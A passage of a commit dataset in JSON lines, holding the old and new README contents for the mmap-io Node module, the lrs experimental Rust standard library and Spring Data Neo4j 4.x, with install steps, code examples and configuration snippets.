More tests are needed so don't count\non it being production ready just yet (but soon).\n\n[[install]]\nInstall\n-------\n\n-------------------\nnpm install mmap-io\n-------------------\n\nor as git clone:\n\n---------------------------------------------\ngit clone https:\/\/github.com\/ozra\/mmap-io.git\ncd mmap-io\nmake\n---------------------------------------------\n\nFor dev'ing, there are some shell scripts for building just the individual\nparts; the Makefile is more of a convenience and does the whole hullabaloo,\nincluding configuring.\n\n[[usage]]\nUsage\n-----\n\n*Note: All code in the examples is in LiveScript*\n\n[source,livescript]\n--------------------------------------------------------------------------------------------------------------------------\n# Following code is plastic fruit; not t[ae]sted...\n\nmmap = require \"mmap-io\"\nfs = require \"fs\"\n\nsome-file = \".\/foo.bar\"\n\nfd = fs.open-sync some-file, \"r\"\nfd-w = fs.open-sync some-file, \"r+\"\n\n# In the following comments, `[blah]` denotes an optional argument,\n# `foo = x` denotes default values for arguments\n\n# map( size, protection, privacy, fd [, offset = 0 [, advise = 0]] ) -> Buffer\n\nsize = fs.stat-sync(fd).size\nrx-prot = mmap.PROT_READ .|. mmap.PROT_EXEC\npriv = mmap.MAP_SHARED\n\nbuffer = mmap.map size, rx-prot, priv, fd\nbuffer2 = mmap.map size, mmap.PROT_READ, priv, fd, 0, mmap.MADV_SEQUENTIAL\nw-buffer = mmap.map size, mmap.PROT_WRITE, priv, fd-w\n\n# advise( buffer, advise ) -> void\n# advise( buffer, offset, length, advise ) -> void\n\nmmap.advise w-buffer, mmap.MADV_RANDOM\n\n# sync( buffer ) -> void\n# sync( buffer, offset, length ) -> void\n# sync( buffer, is-blocking-sync[, do-page-invalidation = false] ) -> void\n# sync( buffer, offset = 0, length = buffer.length [, is-blocking-sync = false [, do-page-invalidation = false]] ) -> void\n\nw-buffer[47] = 42\nmmap.sync w-buffer\nmmap.sync w-buffer, true\nmmap.sync w-buffer, 0, size\nmmap.sync w-buffer, 0, size, true\nmmap.sync w-buffer, 0, size, true, false\n\n# Yeah, you will do _one_ of the variants, of course..\n--------------------------------------------------------------------------------------------------------------------------\n\n[[good-to-know-tm]]\nGood to Know (TM)\n^^^^^^^^^^^^^^^^^\n\n* Check out the man pages mmap(2), madvise(2) and msync(2) for more detailed\nintel.\n* The mapping is automatically unmapped when the buffer is garbage\ncollected.\n* Write-mappings need the fd to be opened with \"r+\", or you'll get a\npermission error (13).\n* If you make a read-only mapping and then ignorantly set a value in the\nbuffer, all hell previously unknown to a JS'er breaks loose\n(segmentation fault). It is possible to write some devilish code to\nintercept the SIGSEGV and throw an exception, but let's not do that!\n* `offset`, and in some cases `length`, needs to be a multiple of\n`mmap-io.PAGESIZE` (which commonly is 4096)\n\n[[tests]]\nTests\n-----\n\n--------------\nnode .\/test.js\n--------------\n\n[[todo-not-todo-and-stuff]]\nTodo, Not Todo and Stuff\n------------------------\n\n* More tests\n* Huge pages are only supported for anonymous \/ private mappings (well,\nin Linux), so I didn't throw in flags for that since I found no use.\n* As Ben Noordhuis previously has stated: Supplying a hint for a fixed\nvirtual memory address is kinda moot in JS, so not supported.\n* If you miss a feature - contribute! Or request it in an issue. I might\nadd it. 
I intend to maintain this module since it will be part of a\ngreat deal of code I'm working on.\n* If documentation isn't clear, make an issue.\n\n[[contributions]]\nContributions\n-------------\n\nPlease PR to the 'develop' branch.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f70a55d48512e7fa046844b316de7db96c59fe77","subject":"autocommit 2015-11-10 22:02:23 CET","message":"autocommit 2015-11-10 22:02:23 CET\n","repos":"lrs-lang\/lib,lrs-lang\/lib","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= *lrs*\n:toc: macro\nifdef::env-github[:build_link: link:Documentation\/adoc\/building_and_using.adoc]\nifndef::env-github[:build_link: link:Documentation\/html\/building_and_using.html]\n:logo: assets\/logo.png\n:source-language: rust\n\nimage::{logo}[logo,float=\"left\"]\n\nlrs is a highly experimental, linux-only standard library for the rustc\ncompiler. It does not use any parts of the standard library that is part of the\nrust distribution.\n\n'''\n\ntoc::[]\n\n== Features\n\nSince lrs is based on the rust compiler, it shares many features with rust\n(e.g., lifetimes, borrow checking, integer overflow checking, etc.). But rustc\nallows us to make significant changes to the language as long as we don't use\nMozilla's standard library. This section lists some of the differences between\nrust and lrs, as well as other features of lrs.\n\nNOTE: In this section we'll compare programs compiled against lrs and programs\ncompiled against the \"standard\" standard library that comes with the rust\ndistribution. To make things simpler, we will call programs that use lrs \"lrs\nprograms\" and programs that use Mozilla's standard library \"rust programs\". It\nshould be clear from the context what is meant.\n\n=== No unwinding\n\nUnwinding and the `panic` macro have been removed from lrs. This means that\nerror handling works via return values or--in the case of unrecoverable\nerrors--process termination. This has the following advantages:\n\nPotentially better performance:: Consider the following function:\n+\n[source]\n----\nfn f(a: &mut u8, b: &mut u8, g: fn()) {\n mem::swap(a, b);\n g();\n mem::swap(a, b);\n}\n----\n+\nIf `g` cannot unwind, then this function can be optimized by removing both\n`swap` calls. But if `g` can unwind, then the `swap` calls must stay in place\nsince destructors called during unwinding might access `a` and `b`.\n\nNo exception unsafety:: Consider the following (incorrect) rust code:\n+\n[source]\n----\nfn push<T>(a: &mut Vec<T>, g: fn() -> T) {\n unsafe {\n assert!(a.capacity() > a.len());\n let len = a.len();\n a.set_len(len + 1); \/\/ <-- BUG\n ptr::write(a.as_mut_ptr().offset(len as isize), g());\n }\n}\n----\n+\nThis is a naive implementation of a non-allocating `push` method on `Vec<T>`.\nThe code is incorrect because the length of the vector is increased before the\nreturn value of `g` has been written to it. If `g` unwinds, the destructor of\n`Vec<T>` will access the invalid value at `a[len]`, which is likely undefined\nbehavior. This problem does not exist in lrs. 
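For contrast, here is what rust code has to do to be exception safe -- a sketch only, not rust's or lrs's actual `Vec` implementation: the new value is written first, and the length is only bumped afterwards, so an unwinding `g` can never expose an uninitialized element to the destructor.\n\n[source]\n----\nfn push<T>(a: &mut Vec<T>, g: fn() -> T) {\n unsafe {\n assert!(a.capacity() > a.len());\n let len = a.len();\n \/\/ evaluate g() and write the value first ...\n ptr::write(a.as_mut_ptr().offset(len as isize), g());\n \/\/ ... and only then make the element visible\n a.set_len(len + 1);\n }\n}\n----\n\nIn lrs, where `g` cannot unwind, either ordering is fine, and this entire class of bugs disappears. 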
See\nhttps:\/\/github.com\/rust-lang\/rfcs\/pull\/1236[this] (long) thread for a discussion\nof exception safety in rust.\n\n=== Small executables\n\n:calc_url: http:\/\/is.gd\/Ep2KIi\n\nlrs programs usually compile down to executables with a size comparable to that\nof equivalent C programs.\n\nIn the table below, `lrs + musl` denotes programs that were statically compiled\nagainst musl, and `lrs - libc` denotes programs that don't depend on a libc.\n\n|===\n|Name |lrs + glibc |lrs + musl |lrs - libc |C (glibc) |rust\n\n|Hello World |7.0KB |4.0KB |1.3KB |6.5KB |436KB\n\n|http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/utilities\/test.html[test]footnote:[Note\nthat the different implementations do not necessarily implement the same\nfeatures.]\n|18KB\n|21KB\n|n\/a\n|35KB\n|462KB\n\n|{calc_url}[A calculator]\n|9.2KB\n|5.8KB\n|n\/a\n|n\/a\n|437KB\n|===\n\nNOTE: All programs were compiled with the `-O -C lto` flags.\n\n=== Direct system calls\n\nlrs interacts with the kernel directly through system calls. That is, lrs does\nnot depend on a libc for 99% of the work. This allows us to use kernel features\nthat do not (yet) have an equivalent libc function and removes an unnecessary\nlayer of abstraction.\n\nIt is, in fact, possible to use lrs without a libc. 
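The wrappers themselves stay thin. The following is a purely illustrative sketch -- every name in it (`syscall3`, `SYS_WRITE`) is made up for illustration and is not lrs's actual API:\n\n[source]\n----\n\/\/ A libc-based program calls the libc wrapper for write(2);\n\/\/ lrs instead invokes the kernel entry point directly\n\/\/ (syscall3 and SYS_WRITE are hypothetical names):\nfn write(fd: i32, buf: &[u8]) -> isize {\n unsafe {\n syscall3(SYS_WRITE, fd as usize, buf.as_ptr() as usize, buf.len())\n }\n}\n----\n\nIt is this thin layer that makes the libc-free mode possible in the first place. 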
This default\nallocator can be chosen at compile time.\n\n=== No allocations in the 99.9% case\n\nAll APIs are designed to not allocate memory in the common case. For example,\n`File::open` will only allocate memory if the requested path is longer than\n`PATH_MAX`. In those cases the API uses the so called fallback allocator. If\nthe user does not want memory to be allocated in those exceptional situations,\nhe can disable said allocator at compile time.\n\n=== Fast compilation\n\nlrs split into many small crates and provides incremental compilation\nindependent of the rustc compiler. Compiling a single crate during development\noften takes less than a second. To this end, lrs comes with its own\nbuild system--lrs_build, discussed below--which ensures that only the minimal\namount of work is done by the compiler.\n\nFurthermore, even complete builds do not take very long. On this (old) machine,\na complete build takes 28 seconds without optimization and 41 seconds with\noptimization.\n\n=== Extensive Linux API coverage\n\nlrs already wraps many of the commonly used linux system calls.\n\nNOTE: Some system calls (such as `vmsplice`) are fundamentally unsafe so that\nlrs will likely never provide safe wrappers for them.\n\n=== Easy to use\n\nEven though lrs programs don't use the standard library that comes with the\ncompiler, the user doesn't have to bother with annoying annotations. For\nexample, the following lrs program can be compiled as written:\n\n[source]\n----\nuse std::tty::{is_a_tty};\n\nfn main() {\n if is_a_tty(&1) {\n println!(\"stdout is a tty\");\n } else {\n println!(\"stdout is not a tty\");\n }\n}\n----\n\nThis is because lrs comes with its own compiler driver that takes care of\ninjecting lrs instead of rust.\n\n=== Concise documentation\n\n*lrs* docs do not try to be a Rust tutorial and are kept short and to the point,\nwith the expectation that most APIs are designed well enough to be understood\nwithout any help. When appropriate, we reference Linux manual pages. On the\nother hand, unsafe APIs and those that are used in unsafe code are explained in\ngreat detail.\n\n== Todo\n\nThere are still many things to do\n\n== Building and Using\n\nPlease see the detailed {build_link}[Building and Using] guide.\n\n== License\n\n:license: link:LICENSE\n\nThe whole library is licensed under the {license}[*MPL 2.0*] license which\nallows static linking into proprietary programs. It is copy-left on a\nfile-by-file basis: Changes to files licensed under the *MPL 2.0* have to be\ndistributed under the same license. It also allows the code to be freely used\nunder several (L)GPL licenses.\n\nSome other parts--such as the compiler plugin and the compiler driver--are\nlicensed under the MIT license.\n\n== Logo\n\n:simple-linux-logo: http:\/\/dablim.deviantart.com\/art\/Simple-Linux-Logo-336131202\n:dablim: http:\/\/dablim.deviantart.com\/\n:ccby: http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\n\nThe lrs link:{logo}[logo] shows a penguin in a sprocket.\n\nIt is based on {simple-linux-logo}[Simple Linux Logo] by {dablim}[Dablim] and is\nlicensed under {ccby}[CC BY-SA 4.0].\n","old_contents":"= *lrs*\n:toc: macro\nifdef::env-github[:build_link: link:Documentation\/adoc\/building_and_using.adoc]\nifndef::env-github[:build_link: link:Documentation\/html\/building_and_using.html]\n:logo: assets\/logo.png\n:source-language: rust\n\nimage::{logo}[logo,float=\"left\"]\n\nlrs is a highly experimental, linux-only standard library for the rustc\ncompiler. 
It does not use any parts of the standard library that is part of the\nrust distribution.\n\n'''\n\ntoc::[]\n\n== Features\n\nSince lrs is based on the rust compiler, it shares many features with rust\n(e.g., lifetimes, borrow checking, integer overflow checking, etc.) But rustc\nallows us to make significant chages to the language as long as we don't use\nMozilla's standard library. This section lists some of the differences between\nrust and lrs and other features of lrs.\n\nNOTE: In this section we'll compare programs compiled against lrs and programs\ncompiled against the \"standard\" standard library that comes with the rust\ndistribution. To make things simpler, we will call programs that use lrs \"lrs\nprograms\" and programs that use Mozilla's standard library \"rust programs\". It\nshould be clear from the context what is meant.\n\n=== No unwinding\n\nUnwinding and the `panic` macro have been removed from lrs. This means that\nerror handling works via return values or--in the case of unrecoverable\nerrors--process termination. This has the following advantages:\n\nPotentially better performance:: Consider the following function:\n+\n[source,rust]\n----\nfn f(a: &mut u8, b: &mut u8, g: fn()) {\n mem::swap(a, b);\n g();\n mem::swap(a, b);\n}\n----\n+\nIf `g` cannot unwind, then this function can be optimized by removing both\n`swap` calls. But if `g` can unwind, then the `swap` calls must stay in place\nsince destructors called during unwinding might access `a` and `b`.\n\nNo exception unsafety:: Consider the following (incorrect) rust code:\n+\n----\nfn push(a: &mut Vec<T>, g: fn() -> T) {\n unsafe {\n assert!(a.capacity() > a.len());\n let len = a.len();\n a.set_len(len + 1); \/\/ <-- BUG\n ptr::write(a.as_mut_ptr().offset(len as isize), g());\n }\n}\n----\n+\nThis is a naive implementation of a non-allocating `push` method on `Vec<T>`.\nThe code is incorrect because the length of the vector is increased before the\nreturn value of `g` has been written to it. If `g` unwinds, the destructor of\n`Vec<T>` will access the invalid value at `a[len]`, which is likely undefined\nbehavior. This problem does not exist in lrs. See\nhttps:\/\/github.com\/rust-lang\/rfcs\/pull\/1236[this] (long) thread for a discussion\nof exception safety in rust.\n\n=== Small executables\n\n:calc_url: http:\/\/is.gd\/Ep2KIi\n\nlrs programs usually compile down to executable with a size comparable to that\nof equivalent C programs.\n\nIn the table below, `lrs + musl` denotes programs that were statically compiled\nagainst musl, and `lrs - libc` denotes programs that don't depend on a libc.\n\n|===\n|Name |lrs + glibc |lrs + musl |lrs - libc |C (glibc) |rust\n\n|Hello World |7.0KB |4.0KB |1.3KB |6.5KB |436KB\n\n|http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/utilities\/test.html[test]footnote:[Note\nthat the different implementations do not necessarily implement the same\nfeatures.]\n|18KB\n|21KB\n|n\/a\n|35KB\n|462KB\n\n|{calc_url}[A calculator]\n|9.2KB\n|5.8KB\n|n\/a\n|n\/a\n|437KB\n|===\n\nNOTE: All programs were compiled with the `-O -C lto` flags.\n\n=== Direct system calls\n\nlrs interact with the kernel directly through system calls. That is, lrs does\nnot depend on a libc for 99% of the work. This allows us to use kernel features\nthat do not (yet) have an equivalent libc function and removes an unnecessary\nlayer of abstraction.\n\nIt is, in fact, possible to use lrs without a libc. 
However, this mode is not\nyet fully developed and mostly useful for testing cross-compilation.\n\n=== glibc and musl support\n\nDue to what was discussed in the previous section, the lrs\/libc interface is so\nsmall that it's almost trivial to make lrs work with different libc versions.\nCurrently, lrs is known to work with glibc and musl.\n\n=== Portable\n\nEven though lrs avoids the libc abstraction layer, porting lrs to new linux\nplatforms is easy. This is due to the way the platform dependent parts of lrs\nmirror the equivalent parts in the linux kernel source code. lrs has already\nbeen ported to *x86_64*, *x32*, *i686*, *arm*, and *arm64*.\n\nWARNING: lrs has only been tested on *x86_64*.\n\n=== Per-object allocators\n\nMany allocating structures in lrs (such as vectors, strings, hashmaps) come\nwith an optional allocator argument. The following allocators are part of lrs:\n\nLibc:: Uses `malloc` and friends from the libc.\nJeMalloc:: Uses jemalloc's non-standard API with sized allocations and\ndeallocations for higher efficiency.\nNoMem:: This dummy-allocator always reports an out-of-memory condition.\nBda:: The *brain-dead allocator* only allocates in multiples of the page size.\nThis is very useful for applications that have few allocations whose size is\nunknown at compile time and can rapidly increase.\n\nCareful note should be taken of the *NoMem* allocator. Consider the following\ncode:\n----\nlet mut buf = [0; 20];\nlet mut vec = Vec::buffered(&mut buf);\nwrite!(&mut vec, \"Hello World {}\", 10).unwrap();\nassert!(&*vec == \"Hello World 10\");\n----\nThe vector is backed by the *NoMem* allocator and the buffer declared in the\nfirst line. It will never dynamically allocate any memory. If we were to write\nmore bytes than can be stored in the buffer, `write!` would return that the\nvector is out of memory. Using this feature, lrs often allows the user to avoid\nallocations in cases where doing so would be rather inconvenient in rust.\n\nNevertheless, it's easy to use lrs collections in the common case where the user\ndoes not care about dynamic allocations. This is because all collections declare\na default allocator so that `Vec<T>` is the same as `Vec<T, Heap>`. This default\nallocator can be chosen at compile time.\n\n=== No allocations in the 99.9% case\n\nAll APIs are designed to not allocate memory in the common case. For example,\n`File::open` will only allocate memory if the requested path is longer than\n`PATH_MAX`. In those cases the API uses the so called fallback allocator. If\nthe user does not want memory to be allocated in those exceptional situations,\nhe can disable said allocator at compile time.\n\n=== Fast compilation\n\nlrs split into many small crates and provides incremental compilation\nindependent of the rustc compiler. Compiling a single crate during development\noften takes less than a second. To this end, lrs comes with its own\nbuild system--lrs_build, discussed below--which ensures that only the minimal\namount of work is done by the compiler.\n\nFurthermore, even complete builds do not take very long. 
On this (old) machine,\na complete build takes 28 seconds without optimization and 41 seconds with\noptimization.\n\n=== Extensive Linux API coverage\n\nlrs already wraps many of the commonly used linux system calls.\n\nNOTE: Some system calls (such as `vmsplice`) are fundamentally unsafe so that\nlrs will likely never provide safe wrappers for them.\n\n=== Easy to use\n\nEven though lrs programs don't use the standard library that comes with the\ncompiler, the user doesn't have to bother with annoying annotations. For\nexample, the following lrs program can be compiled as written:\n\n----\nuse std::tty::{is_a_tty};\n\nfn main() {\n if is_a_tty(&1) {\n println!(\"stdout is a tty\");\n } else {\n println!(\"stdout is not a tty\");\n }\n}\n----\n\nThis is because lrs comes with its own compiler driver that takes care of\ninjecting lrs instead of rust.\n\n=== Concise documentation\n\n*lrs* docs do not try to be a Rust tutorial and are kept short and to the point,\nwith the expectation that most APIs are designed well enough to be understood\nwithout any help. When appropriate, we reference Linux manual pages. On the\nother hand, unsafe APIs and those that are used in unsafe code are explained in\ngreat detail.\n\n== Todo\n\nThere are still many things to do\n\n== Building and Using\n\nPlease see the detailed {build_link}[Building and Using] guide.\n\n== License\n\n:license: link:LICENSE\n\nThe whole library is licensed under the {license}[*MPL 2.0*] license which\nallows static linking into proprietary programs. It is copy-left on a\nfile-by-file basis: Changes to files licensed under the *MPL 2.0* have to be\ndistributed under the same license. It also allows the code to be freely used\nunder several (L)GPL licenses.\n\nSome other parts--such as the compiler plugin and the compiler driver--are\nlicensed under the MIT license.\n\n== Logo\n\n:simple-linux-logo: http:\/\/dablim.deviantart.com\/art\/Simple-Linux-Logo-336131202\n:dablim: http:\/\/dablim.deviantart.com\/\n:ccby: http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\n\nThe lrs link:{logo}[logo] shows a penguin in a sprocket.\n\nIt is based on {simple-linux-logo}[Simple Linux Logo] by {dablim}[Dablim] and is\nlicensed under {ccby}[CC BY-SA 4.0].\n","returncode":0,"stderr":"","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"2af7297d4dfebfbf0117a4f53af8f7b01877ce8c","subject":"DATAGRAPH-823 - Switch master branch to SDN 4.x.","message":"DATAGRAPH-823 - Switch master branch to SDN 4.x.\n\nFixed typos.","repos":"espiegelberg\/spring-data-neo4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"[NOTE]\nThis branch (master) now points to Spring Data Neo4j 4.x the *new* implementation that is based on http:\/\/github.com\/neo4j\/neo4j-ogm[Neo4j-OGM].\n\n= Spring Data Neo4j 4.x - Quick start\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"FRIEND\", direction = \"UNDIRECTED\")\n private Set<Person> friends;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void knows(Person friend) { friends.add(friend); }\n}\n\npublic interface PersonRepository extends GraphRepository<Person> {\n}\n\nPerson jon = new Person(\"Jon\");\nPerson emil = new Person(\"Emil\");\nPerson rod = new Person(\"Rod\");\n\nemil.knows(jon);\nemil.knows(rod);\n\n\/\/ Persist entities and relationships to graph database\npersonRepository.save(emil);\n\nfor (Person friend : emil.getFriends()) {\n System.out.println(\"Friend: \" + friend);\n}\n\n\/\/ 
Control loading depth\njon = personRepository.findOne(id, 2);\nfor (Person friend : jon.getFriends()) {\n System.out.println(\"Jon's friends to depth 2: \" + friend);\n}\n----\n\n== About\n\nThe primary goal of the http:\/\/projects.spring.io\/spring-data[Spring Data] project is to make it more convenient and consistent to build Spring-based applications that use modern data technologies.\nSpring Data Neo4j integrates the leading http:\/\/neo4j.com\/[Neo4j] Graph Database.\n\nThe Spring Data Neo4j project provides a simplified POJO based programming model that reduces the amount of boilerplate code needed to create Neo4j applications.\n\nIt supports:\n\n* automatic mapping of annotated domain entities for nodes and relationships\n* interface based repositories with provided, derived, and annotated finder methods\n* transaction control\n* multi-transport (embedded, http, [bolt])\n* exception translation\n* integration into Spring Data REST\n* works well within Spring Boot\n\n== Using Spring Data Neo4j\n\n=== Maven configuration\n\n* Add the maven repository and dependency:\n\n.pom.xml\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.springframework.data<\/groupId>\n <artifactId>spring-data-neo4j<\/artifactId>\n <version>4.1.0.BUILD-SNAPSHOT<\/version> <!-- or .M1 when released -->\n <\/dependency>\n<\/dependencies>\n<repositories>\n <repository>\n <id>spring-maven-snapshot<\/id>\n <snapshots><enabled>true<\/enabled><\/snapshots>\n <name>Springframework Maven MILESTONE Repository<\/name>\n <url>http:\/\/maven.springframework.org\/milestone<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n=== Spring configuration\n\n* Configure Spring Data Neo4j 4.1 in your application using Java-based bean configuration:\n\n.MyConfiguration.java\n[source,java]\n----\n@Configuration\n@EnableNeo4jRepositories(basePackages = \"com.example.person.repository\",...)\n@EnableTransactionManagement\npublic class MyConfiguration extends Neo4jConfiguration {\n\n @Bean\n public SessionFactory getSessionFactory() {\n \/\/ with domain entity base package(s)\n return new SessionFactory(\"com.example.person.domain\",...);\n }\n\n \/\/ needed for session in view in web-applications\n @Bean\n @Scope(value = \"session\", proxyMode = ScopedProxyMode.TARGET_CLASS)\n public Session getSession() throws Exception {\n return super.getSession();\n }\n\n}\n----\n\nSpring Data Neo4j 4.1 provides support for connecting to Neo4j using different drivers.\nHTTP and Embedded drivers are available. \nSpring Data Neo4j will attempt to auto-configure itself using a file called `ogm.properties`, which it expects to find on the classpath.\n\n.ogm.properties\n[source,ini]\n----\ndriver=org.neo4j.ogm.drivers.http.driver.HttpDriver\nURI=http:\/\/user:password@localhost:7474\n----\n\nThe application can be configured programmatically as well; please http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#_spring_configuration[read the reference guide] for more information.\n\n=== Graph entities\n\n* Annotate your entity class. 
In this case it is a 'Person' class that has a relationship to the 'Company' they work at:\n\n[source,java]\n----\npackage com.example.person.domain;\n\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"WORKS_AT\", direction = \"OUTGOING\")\n private Company employer;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n public void worksAt(Company employer) { this.employer = employer; }\n}\n----\n\n=== Transactional services\n\nCreate a repository or service to perform typical operations on your entities. \nThe complete functionality is covered in the http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#reference_programming-model[reference manual].\n\n[source,java]\n----\npackage com.example.person.repository;\n\npublic interface PersonRepository extends GraphRepository<Person> {\n\n \/\/ derived finder method\n Person findByName(String name);\n \n @Query(\"MATCH (c:Company)<-[:WORKS_AT]-(p:Person) WHERE id(c) = {company} RETURN p\")\n List<Person> findEmployees(Company company);\n}\n\npackage com.example.person.service;\n\n@Service\n@Transactional\npublic class EmployeeService {\n\n @Autowired\n private PersonRepository personRepository;\n\n public long getNumberOfPeople() {\n return personRepository.count();\n }\n\n public Person createPerson(String name) {\n return personRepository.save(new Person(name));\n }\n\n public Iterable<Person> getAllPeople() {\n return personRepository.findAll();\n }\n\n public List<Person> getEmployees(Company c) {\n return personRepository.findEmployees(c);\n }\n}\n----\n\nPlease see the https:\/\/github.com\/neo4j-examples\/sdn4-university\/tree\/4.1[SDN University sample project] for more information.\n\nMore example projects for Spring Data Neo4j 4 are available in the https:\/\/github.com\/neo4j-examples?query=sdn4[Neo4j-Examples] repository.\n\n== Getting Help\n\nThis README and the http:\/\/static.springsource.org\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/[Reference Manual] are the best places to start learning about Spring Data Neo4j 4.\n\nThe main http:\/\/projects.spring.io\/spring-data-neo4j[SpringSource project site] contains links to basic project information such as source code, JavaDocs, issue tracking, etc.\n\nFor more detailed questions, use the http:\/\/forum.springsource.org\/forumdisplay.php?f=80[forum]. 
If you are new to Spring as well as to Spring Data, look for information about http:\/\/www.springsource.org\/projects[Spring projects].\n\n\nYou will also find help on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow].\n\n== Contributing to Spring Data Neo4j\n\nThere are dedicated, mandatory https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for all Spring Data projects.\n\nHere are some ways for you to get involved in the community:\n\n* Get involved with the Spring Data Neo4j community on the http:\/\/groups.google.com\/group\/neo4j[Neo4j Google Group] and by helping on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow].\n* Create https:\/\/jira.springframework.org\/browse\/DATAGRAPH[JIRA] tickets for bugs and new features and comment and vote on the ones that you are interested in.\n* Github is for social coding: if you want to write code, we encourage contributions through *pull requests* from a fork of this repository.\n If you want to contribute code this way, please read the https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for details.\n","old_contents":"[NOTE]\nThis branch (master) now points to Spring Data Neo4j 4.x, the *new* implementation that is based on http:\/\/github.com\/neo4j\/neo4j-ogm[Neo4j-OGM].\n\n= Spring Data Neo4j 4.x - Quick start\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"FRIEND\", direction = \"UNDIRECTED\")\n private Set<Person> friends;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n public void knows(Person friend) { friends.add(friend); }\n}\n\npublic interface PersonRepository extends GraphRepository<Person> {\n}\n\nPerson jon = new Person(\"Jon\");\nPerson emil = new Person(\"Emil\");\nPerson rod = new Person(\"Rod\");\n\nemil.knows(jon);\nemil.knows(rod);\n\n\/\/ Persist entities and relationships to graph database\npersonRepository.save(emil);\n\nfor (Person friend : emil.getFriends()) {\n System.out.println(\"Friend: \" + friend);\n}\n\n\/\/ Control loading depth\njon = personRepository.findOne(id, 2);\nfor (Person friend : jon.getFriends()) {\n System.out.println(\"Jon's friends to depth 2: \" + friend);\n}\n----\n\n== About\n\nThe primary goal of the http:\/\/projects.spring.io\/spring-data[Spring Data] project is to make it more convenient and consistent to build Spring-based applications that use modern data technologies.\nSpring Data Neo4j integrates the leading http:\/\/neo4j.com\/[Neo4j] Graph Database.\n\nThe Spring Data Neo4j project provides a simplified POJO based programming model that reduces the amount of boilerplate code needed to create Neo4j applications.\n\nIt supports:\n\n* automatic mapping of annotated domain entities for nodes and relationships\n* interface based repositories with provided, derived, and annotated finder methods\n* transaction control\n* multi-transport (embedded, http, [bolt])\n* exception translation\n* integration into Spring Data REST\n* works well within Spring Boot\n\n== Using Spring Data Neo4j\n\n=== Maven configuration\n\n* Add the maven repository and dependency:\n\n.pom.xml\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.springframework.data<\/groupId>\n <artifactId>spring-data-neo4j<\/artifactId>\n <version>4.1.0.BUILD-SNAPSHOT<\/version> <!-- or .M1 when released -->\n 
<\/dependency>\n<\/dependencies>\n<repositories>\n <repository>\n <id>spring-maven-snapshot<\/id>\n <snapshots><enabled>true<\/enabled><\/snapshots>\n <name>Springframework Maven MILESTONE Repository<\/name>\n <url>http:\/\/maven.springframework.org\/milestone<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n=== Spring configuration\n\n* Configure Spring Data Neo4j 4.1 in your application using Java-based bean configuration\n\n.MyConfiguration.java\n[source,java]\n----\n@Configuration\n@EnableNeo4jRepositories(basePackages = \"org.neo4j.example.repository\")\n@EnableTransactionManagement\npublic class MyConfiguration extends Neo4jConfiguration {\n\n @Bean\n public SessionFactory getSessionFactory() {\n \/\/ with domain entity base package(s)\n return new SessionFactory(\"org.neo4j.example.domain\");\n }\n\n \/\/ needed for session in view in web-applications\n @Bean\n @Scope(value = \"session\", proxyMode = ScopedProxyMode.TARGET_CLASS)\n public Session getSession() throws Exception {\n return super.getSession();\n }\n\n}\n----\n\nSpring Data Neo4j 4.1 provides support for connecting to Neo4j using different drivers.\nHTTP and Embedded drivers are available. \nSpring Data Neo4j will attempt to auto-configure itself using a file called `ogm.properties`, which it expects to find on the classpath.\n\n.ogm.properties\n[source,java]\n----\ndriver=org.neo4j.ogm.drivers.http.driver.HttpDriver\nURI=http:\/\/user:password@localhost:7474\n----\n\nThe application can be configured programmatically as well, please http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#_spring_configuration[read the reference guide] for more information.\n\n=== Graph entities\n\n* Annotate your entity class. In this case it is a 'Person' class that has a relationship to the 'Company' they work at :\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"WORKS_AT\", direction = \"OUTGOING\")\n private Company employer;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void worksAt(Company employer) { this.employer = employer; }\n}\n----\n\n=== Transactional services\n\nCreate a repository or service to perform typical operations on your entities. 
\nThe complete functionality is covered in the http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#reference_programming-model[reference manual]\n\n[source,java]\n----\npublic interface PersonRepository extends GraphRepository<Person> {\n\n \/\/ derived finder method\n Person findByName(String name);\n \n @Query(\"MATCH (:Company)<-[:WORKS_AT]-(p:Person) WHERE id(c) = {company} RETURN p\")\n List<Person> findEmployees(Company company);\n}\n\n@Service\n@Transactional\npublic class EmployeeService {\n\n @Autowired\n private PersonRepository personRepository;\n\n public int getNumberOfPeople() {\n return personRepository.count();\n }\n\n public Person createPerson(String name) {\n return personRepository.save(new Person(name));\n }\n\n public List<Person> getAllPeople() {\n return personRepository.findAll();\n }\n\n public List<Person> getEmployees(Company c) {\n return personRepository.findEmployees(c);\n }\n}\n----\n\nPlease see the https:\/\/github.com\/neo4j-examples\/sdn4-university\/tree\/4.1[SDN University sample project] for more information.\n\nMore example projects for Spring Data Neo4j 4 are available in the https:\/\/github.com\/neo4j-examples?query=sdn4[Neo4j-Examples] 